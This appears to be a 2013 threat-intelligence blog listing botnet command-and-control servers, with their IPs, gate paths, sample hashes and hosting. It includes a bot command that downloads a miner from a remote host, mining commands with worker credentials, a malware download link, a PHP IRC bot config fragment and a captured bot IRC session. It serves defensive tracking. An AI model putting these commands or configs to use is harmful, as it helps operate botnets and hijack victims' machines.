Month: December 2013

illuminati.sx (Plasma http botnet hosted by worldstream.nl)

Resolved illuminati.sx to 109.236.80.74
Server: illuminati.sx
Gate file: /http/gate.php
This is the first time I have seen the HTTP version of Plasma and it sucks hard. It seems to be a slightly upgraded version of the old Barracuda HTTP bot, with few of the problems fixed.
Hosting info: http://whois.domaintools.com/109.236.80.74
Bitcoin mining info: miner.start http://109.236.80.74/miner/CPUMiner.files *-a

boot.sx (Betabot http botnet hosted by worldstream.nl)

Resolved boot.sx to 109.236.80.74
Server: boot.sx
Gate file: /g4sg/order.php
Alternate domain: illuminati.sx
This Betabot is quite interesting due to the bizarre crypter it uses. The crypter starts with a WinRAR SFX archive. This dumps its contents in the user's temp folder and starts the next layer, a VBS script. The VBS script runs an AutoIT

fapncam.com (betabot hosted by Digitalocean.com)

Resolved fapncam.com to 192.81.216.12
Server: fapncam.com
Gate file: /beta/order.php
Alternate domains: update-silo.com, proxypool.info, frizzcams.com
Hosting info: http://whois.domaintools.com/192.81.216.12
Related md5 (download sample from Malwr.com)
Betabot: 52435233bd228dfffc2a2c7e001f66c8

gd.derpcity.ru (godscan botnet hosted in France, Roubaix, OVH Systems)

Found by AliSs
Server: 37.59.53.162:6667
PASS weed >>
PASS weed >>
NICK [NeW|00|USA|xP|HOME|5035] >>
NICK [NeW|00|USA|xP|HOME|5035] >>
USER varun * 0 :HOME >>
PING :1389B8E6 >>
PONG 1389B8E6 <<
PRIVMSG [NeW|00|USA|xP|HOME|5035] :\x01VERSION\x01 <<
001 [NeW|00|USA|xP|HOME|5035] : <<
002 [NeW|00|USA|xP|HOME|5035] : <<
003 [NeW|00|USA|xP|HOME|5035] : <<
004 [NeW|00|USA|xP|HOME|5035] : <<
005 [NeW|00|USA|xP|HOME|5035] : <<
005 [NeW|00|USA|xP|HOME|5035] : <<
005 [NeW|00|USA|xP|HOME|5035] : <<
375 [NeW|00|USA|xP|HOME|5035] :/MOTD <<
372 [NeW|00|USA|xP|HOME|5035] :- 5/11/2013 17:10 <<

bot.blackunix.us (Linux bots hosted in France, Roubaix, OVH Systems)

Found by Yewnix.
Resolved: [bot.blackunix.us] To [94.23.89.246]
Resolved: [bot.blackunix.us] To [217.29.115.1]
Resolved: [bot.blackunix.us] To [91.151.85.31]
Resolved: [bot.blackunix.us] To [59.167.240.231]
Resolved: [bot.blackunix.us] To [58.180.42.200]
Resolved: [bot.blackunix.us] To [64.31.27.18]

class pBot {
    var $config = array(
        "server"   => "bot.blackunix.us",
        "port"     => "20",
        "pass"     => "",
        "prefix"   => "Blood",
        "maxrand"  => "15",
        "key"      => "none",
        "chan"     => "#metri",
        "modes"    => "+ps",
        "chan2"    => "#metri",
        "password" => "crack",
        "trigger"  => ".",
        "hostauth" => "bogel.us" // * for any hostname (remember: /setvhost pasukan.ddos.reload-x.us)

Hosting

keshmoney.biz (IRC botnet hosted in France, Roubaix, OVH Systems)

Found by AliSs
Server: keshmoney.biz:6667
Channel: #all,#x00 password 777.#boss
Bitcoin miner: hxxp://knal.wut.re:8332 -u bram226_1
Hosted in this link: hxxp://noinei90.sommadue.it/Built.exe
Sample here
Hosting infos: http://whois.domaintools.com/37.59.53.162

meziamussucemaqueue.su (Betabot http botnet hosted by sunnyvision.com)

Resolved meziamussucemaqueue.su to 124.248.205.104
Server: meziamussucemaqueue.su
Gate file: /phpmiadmin/order.php
Alternate domain: umbxd15896.su
Bitcoin mining info: -o http://ypool.net:8080 -u Teolous.PTS_1 -p x
Hosting info: http://whois.domaintools.com/124.248.205.104
Related md5s (download sample from malwr.com)
Betabot: 670fa0a15754e1d67810eea73e890dad
Bitcoin miner: e1aed5a5d729d37efca73602d8bc66e9
Bitcoin miner 2: a92403926113dd4b3a4d3e4c48eace66
EDIT: new mining info: stratum+tcp://pool.d2.cc:3335 -u Hanito.bot -p 3fcua4

frineon.su (Smoke loader hosted by fastflux botnet)

Server: frineon.su
Gate file: /forum/index.php
Hosting info:
;; QUESTION SECTION:
;frineon.su.			IN	A

;; ANSWER SECTION:
frineon.su.		150	IN	A	91.188.52.67
frineon.su.		150	IN	A	212.92.228.65
frineon.su.		150	IN	A	109.200.244.121
frineon.su.		150	IN	A	76.66.174.231
frineon.su.		150	IN	A	98.218.49.187
frineon.su.		150	IN	A	72.185.70.143
frineon.su.		150	IN	A	72.185.199.204
frineon.su.		150	IN	A